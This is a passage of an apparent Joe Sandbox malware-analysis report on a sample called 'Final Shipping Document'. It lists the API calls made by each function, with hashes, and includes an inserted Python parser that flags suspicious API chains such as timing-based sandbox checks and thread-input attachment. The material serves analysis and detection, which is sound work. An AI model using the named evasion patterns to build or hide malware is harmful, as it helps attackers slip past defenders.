                                                              • Part of subcall function 00C08D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C0790A,?,000000FF,?,00C08754,00000000,?,0000001C,?,?), ref: 00C08D8C
                                                              • Part of subcall function 00C08D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00C08DB2
                                                              • Part of subcall function 00C08D7D: lstrcmpiW.KERNEL32(00000000,?,00C0790A,?,000000FF,?,00C08754,00000000,?,0000001C,?,?), ref: 00C08DE3
                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C08754,00000000,?,0000001C,?,?,00000000), ref: 00C07923
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00C07949
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C08754,00000000,?,0000001C,?,?,00000000), ref: 00C07984
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            • Opcode ID: 03d8ec4c116693d385a8bf18ec89df812e271cb13ba84f17635b68ef1fe04513
                                                            • Instruction ID: 036f430289170e3178c43a05ef5b99fc5fb8f567bddf945a25400278e0570f42
                                                            • Opcode Fuzzy Hash: 03d8ec4c116693d385a8bf18ec89df812e271cb13ba84f17635b68ef1fe04513
                                                            • Instruction Fuzzy Hash: DF11063A200302ABCF156F34DC45E7E77A9FF45350B00412AF842C72A4EB31D911D7A1
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C37D0B
                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00C37D2A
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C37D42
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C1B7AD,00000000), ref: 00C37D6B
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID:
                                                            • API String ID: 847901565-0
                                                            • Opcode ID: b49ce03331241c2a792d6e548d436e8aa3189f11156873c369901b3062a0b1d9
                                                            • Instruction ID: 914d4ebeb63152ef623ed7262d62a489cee38c533a10fceef9b0892cddfe0d23
                                                            • Opcode Fuzzy Hash: b49ce03331241c2a792d6e548d436e8aa3189f11156873c369901b3062a0b1d9
                                                            • Instruction Fuzzy Hash: 6E11DF72224654AFCB208F28CC04BAA3BA4AF453B0F258324FD39D72F0D7308A51DB40
                                                            APIs
                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 00C356BB
                                                            • _wcslen.LIBCMT ref: 00C356CD
                                                            • _wcslen.LIBCMT ref: 00C356D8
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C35816
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend_wcslen
                                                            • String ID:
                                                            • API String ID: 455545452-0
                                                            • Opcode ID: 5f83bc062c542861c8e645d9ffbd277a75cc0a38fa73708f99cc852d6b894ab5
                                                            • Instruction ID: bcd60e81419745a77166ab89adb6a4098cc9513ada2ce302c52970f1839e219e
                                                            • Opcode Fuzzy Hash: 5f83bc062c542861c8e645d9ffbd277a75cc0a38fa73708f99cc852d6b894ab5
                                                            • Instruction Fuzzy Hash: 0F11B1B16206189ADB20DF658C86BEE77BCAF11760F50406AF925D6181EB708B80CF64
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C01A47
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C01A59
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C01A6F
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C01A8A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 050af3e10a543b592f07ed3d59a445f24eb7956903b2c76e1e3e766eb9a7616d
                                                            • Instruction ID: 57961d7aec1394256abeabe10ff5804486d9bc5bf038ae1b6a6c40831c1c17ce
                                                            • Opcode Fuzzy Hash: 050af3e10a543b592f07ed3d59a445f24eb7956903b2c76e1e3e766eb9a7616d
                                                            • Instruction Fuzzy Hash: 4011F73AA01219FFEB119BA5CD85FADFB78EB08750F240091EA14B7290D6716F50EB94
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00C0E1FD
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00C0E230
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C0E246
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C0E24D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                            • String ID:
                                                            • API String ID: 2880819207-0
                                                            • Opcode ID: 44c75edaaa2febe3055fe899ece7e5daf2cb950b20b12cc21b8fb77135674053
                                                            • Instruction ID: fcdb60e9f40711340f5460e1b142060804228063922daf3f146eea440bf6f1b9
                                                            • Opcode Fuzzy Hash: 44c75edaaa2febe3055fe899ece7e5daf2cb950b20b12cc21b8fb77135674053
                                                            • Instruction Fuzzy Hash: 5311C876904254BBC7019BAC9C49B9E7FAC9B45324F044669F924E32D1D670CA44C7A0
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,?,00BCCFF9,00000000,00000004,00000000), ref: 00BCD218
                                                            • GetLastError.KERNEL32 ref: 00BCD224
                                                            • __dosmaperr.LIBCMT ref: 00BCD22B
                                                            • ResumeThread.KERNEL32(00000000), ref: 00BCD249
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                            • String ID:
                                                            • API String ID: 173952441-0
                                                            • Opcode ID: 28f15ff2a8e5e30287cf0f073ddf3d8f00d9a52db8e2b0884b4e7ca187236b76
                                                            • Instruction ID: 616595278a69d60f055009694e05547546e177fc8e3851d5b7a4d81a3b9d1e30
                                                            • Opcode Fuzzy Hash: 28f15ff2a8e5e30287cf0f073ddf3d8f00d9a52db8e2b0884b4e7ca187236b76
                                                            • Instruction Fuzzy Hash: DE01D67A4051047BC7115BA5DC49FAE7AEDDF81331F1002ADF925AA1E0DB70C901D7A0
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BA604C
                                                            • GetStockObject.GDI32(00000011), ref: 00BA6060
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA606A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateMessageObjectSendStockWindow
                                                            • String ID:
                                                            • API String ID: 3970641297-0
                                                            • Opcode ID: 88cc219026a49f027aeece8a36279a3f6129530f1d5fe671fa19ab642fb9eb79
                                                            • Instruction ID: 505170ae86fbcb30247c9235bd58e2cf8ed8768269fa9bdb2e20225ef826aeff
                                                            • Opcode Fuzzy Hash: 88cc219026a49f027aeece8a36279a3f6129530f1d5fe671fa19ab642fb9eb79
                                                            • Instruction Fuzzy Hash: A61161B2505549BFEF264FA49C84FEE7BA9EF0A354F090155FA1452110D7329CA0EB90
                                                            APIs
                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00BC3B56
                                                              • Part of subcall function 00BC3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00BC3AD2
                                                              • Part of subcall function 00BC3AA3: ___AdjustPointer.LIBCMT ref: 00BC3AED
                                                            • _UnwindNestedFrames.LIBCMT ref: 00BC3B6B
                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00BC3B7C
                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00BC3BA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                            • String ID:
                                                            • API String ID: 737400349-0
                                                            • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                            • Instruction ID: 9cd57fbded81cc45a84f9107489d06b73e5915930c558d470c172a5c4bcf4694
                                                            • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                            • Instruction Fuzzy Hash: C3011732100148BBDF125E95CC42EEB7BEDEF58B54F448098FE4856121C732E9619BA0
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00BA13C6,00000000,00000000,?,00BD301A,00BA13C6,00000000,00000000,00000000,?,00BD328B,00000006,FlsSetValue), ref: 00BD30A5
                                                            • GetLastError.KERNEL32(?,00BD301A,00BA13C6,00000000,00000000,00000000,?,00BD328B,00000006,FlsSetValue,00C42290,FlsSetValue,00000000,00000364,?,00BD2E46), ref: 00BD30B1
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BD301A,00BA13C6,00000000,00000000,00000000,?,00BD328B,00000006,FlsSetValue,00C42290,FlsSetValue,00000000), ref: 00BD30BF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: e0ad2d46bc3e34f75249ba683c5bbc7a48e81dc130e8aa59de783ca87c37d832
                                                            • Instruction ID: 3844657a976c7a76db754bd295f8195f292a9e4745068593cc076d5609913e0d
                                                            • Opcode Fuzzy Hash: e0ad2d46bc3e34f75249ba683c5bbc7a48e81dc130e8aa59de783ca87c37d832
                                                            • Instruction Fuzzy Hash: 7701D436311222ABCB214A78AC84B5FBBD8EF05F61B240662F909F3242E721D901C7E1
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00C0747F
                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C07497
                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C074AC
                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C074CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                            • String ID:
                                                            • API String ID: 1352324309-0
                                                            • Opcode ID: a3fc5e462275e39806ecf160ed55b41c607037c75e2688191f01d68b4b093142
                                                            • Instruction ID: 83418bb90f4861146e5286638e10f46c4b93d29b7d65cf66817ba4ae1d953ba0
                                                            • Opcode Fuzzy Hash: a3fc5e462275e39806ecf160ed55b41c607037c75e2688191f01d68b4b093142
                                                            • Instruction Fuzzy Hash: 2E11C4B5A053149FE7208F94DC48FAA7FFCEB00B00F108669A666D6191D7B0F944DF60
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0C4
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0E9
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0F3
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B126
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            • Opcode ID: a93d38b4faee127a171df01743514cfa5c56ba0cece8551efd8f7b332897e283
                                                            • Instruction ID: 418d68d1ed86753bbe163a4795936f45b58a11f62645bf22c1c81449d8efdcad
                                                            • Opcode Fuzzy Hash: a93d38b4faee127a171df01743514cfa5c56ba0cece8551efd8f7b332897e283
                                                            • Instruction Fuzzy Hash: 91113971C01928E7CF00EFA5E998BEEBB78FF19711F104085DA51B2181CB309A60DB91
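The QueryPerformanceCounter/Sleep pair above is the execution-timing pattern the report's signature list calls out, and the token, thread and window API chains elsewhere in this section are the kind of sequences an analyst scans for when triaging a report of this size. The following is an added example, not part of the Joe Sandbox report or its tooling: a small Python parser for the "APIs" entries in this report's rendering, plus a set of heuristic API-chain rules. The chain labels and the choice of APIs in each rule are the editor's own assumptions, not Joe Sandbox signatures; the sample input is excerpted verbatim from the entries printed in this section.

```python
import re
from typing import Dict, List, Optional, Tuple

# One "APIs" bullet as rendered in the report, e.g.
#   • Sleep.KERNEL32(00000000,?), ref: 00C0B0E9
#   • GetCurrentThreadId.KERNEL32 ref: 00C02DDD
#   • Part of subcall function 00BB9639: ExtCreatePen.GDI32(?,?), ref: 00BB9693
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[\w:]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
OPCODE_LINE = re.compile(r"•\s*Opcode ID:\s*(?P<id>[0-9a-f]{64})")

# Heuristic chains worth a second look (editor's own assumption, not
# Joe Sandbox signatures). A rule fires when every listed API name occurs
# in the same function record, whether directly or via a subcall.
CHAINS: Dict[str, frozenset] = {
    "execution timing check": frozenset({"QueryPerformanceCounter", "Sleep"}),
    "own token inspection": frozenset({"GetCurrentProcess", "OpenProcessToken"}),
    "input attach to foreign window": frozenset({"GetWindowThreadProcessId", "AttachThreadInput"}),
    "suspended thread resumed": frozenset({"ResumeThread"}),
    "runtime library load": frozenset({"LoadLibraryExW"}),
    "type library registration": frozenset({"LoadTypeLibEx", "RegisterTypeLib"}),
}

# Constructed sample: four function records copied from this report section.
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0C4
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0E9
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0F3
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B126
Memory Dump Source
• Opcode ID: a93d38b4faee127a171df01743514cfa5c56ba0cece8551efd8f7b332897e283
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C02DC5
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00C02DD6
• GetCurrentThreadId.KERNEL32 ref: 00C02DDD
• AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C02DE4
APIs
• GetCurrentThread.KERNEL32 ref: 00C01634
• OpenThreadToken.ADVAPI32(00000000,?,?,?,00C011D9), ref: 00C0163B
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C011D9), ref: 00C01648
• OpenProcessToken.ADVAPI32(00000000,?,?,?,00C011D9), ref: 00C0164F
APIs
  • Part of subcall function 00BB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB9693
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00C38887
"""


def parse_records(text: str) -> List[dict]:
    """Split the report text into one record per 'APIs' header."""
    records: List[dict] = []
    current: Optional[dict] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"apis": [], "subcalls": [], "refs": [], "opcode_id": None}
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.search(line)
        if m:
            entry = f"{m['api']}.{m['mod']}"
            (current["subcalls"] if m["sub"] else current["apis"]).append(entry)
            current["refs"].append(m["ref"])
            continue
        m = OPCODE_LINE.search(line)
        if m:
            current["opcode_id"] = m["id"]
    return records


def flag_chains(records: List[dict]) -> List[Tuple[Optional[str], str]]:
    """Return (first call-site address, rule label) for every rule that fires."""
    hits: List[Tuple[Optional[str], str]] = []
    for rec in records:
        names = {entry.split(".")[0] for entry in rec["apis"] + rec["subcalls"]}
        for label, required in CHAINS.items():
            if required <= names:
                hits.append((rec["refs"][0] if rec["refs"] else None, label))
    return hits


if __name__ == "__main__":
    for ref, label in flag_chains(parse_records(SAMPLE)):
        print(f"{ref}: {label}")
```

Run against a full report export, the address in each hit is the `ref:` of the first call in the record, which lines up with the disassembly view so the chain can be inspected in context; a rule that needs a single API (ResumeThread, LoadLibraryExW) will fire on benign runtime code too, so treat hits as a reading order, not a verdict.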
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 00BB98CC
                                                            • SetTextColor.GDI32(?,?), ref: 00BB98D6
                                                            • SetBkMode.GDI32(?,00000001), ref: 00BB98E9
                                                            • GetStockObject.GDI32(00000005), ref: 00BB98F1
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Color$LongModeObjectStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1860813098-0
                                                            • Opcode ID: 4b24206c40f967b7e1ee0692b8fbfb354aba643e1f2f40f9ebad956030a36136
                                                            • Instruction ID: 97ed17d70d1a1e0cc90f8b9e2cb4bd75c155870085e2483ecbf5f99e71a8551a
                                                            • Opcode Fuzzy Hash: 4b24206c40f967b7e1ee0692b8fbfb354aba643e1f2f40f9ebad956030a36136
                                                            • Instruction Fuzzy Hash: B50168336862109BC7128F25ECA5FFE3BA0DB66765B09009DF782DB2A1CBB54981C750
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C02DC5
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C02DD6
                                                            • GetCurrentThreadId.KERNEL32 ref: 00C02DDD
                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C02DE4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 2710830443-0
                                                            • Opcode ID: c9c52c2a7482a42d1d8b89ee3733b6db7c29eeb9a69e913ba47eb2e097670057
                                                            • Instruction ID: f6f4c6068fa098152cdf3f5f61360fa50b29884920f52dc2a281d1323378ca56
                                                            • Opcode Fuzzy Hash: c9c52c2a7482a42d1d8b89ee3733b6db7c29eeb9a69e913ba47eb2e097670057
                                                            • Instruction Fuzzy Hash: 23E01271511724BBDB201B739C8EFEF7E6CEF56BA1F400115F505E10909AA5C941D7B1
                                                            APIs
                                                              • Part of subcall function 00BB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB9693
                                                              • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96A2
                                                              • Part of subcall function 00BB9639: BeginPath.GDI32(?), ref: 00BB96B9
                                                              • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96E2
                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00C38887
                                                            • LineTo.GDI32(?,?,?), ref: 00C38894
                                                            • EndPath.GDI32(?), ref: 00C388A4
                                                            • StrokePath.GDI32(?), ref: 00C388B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
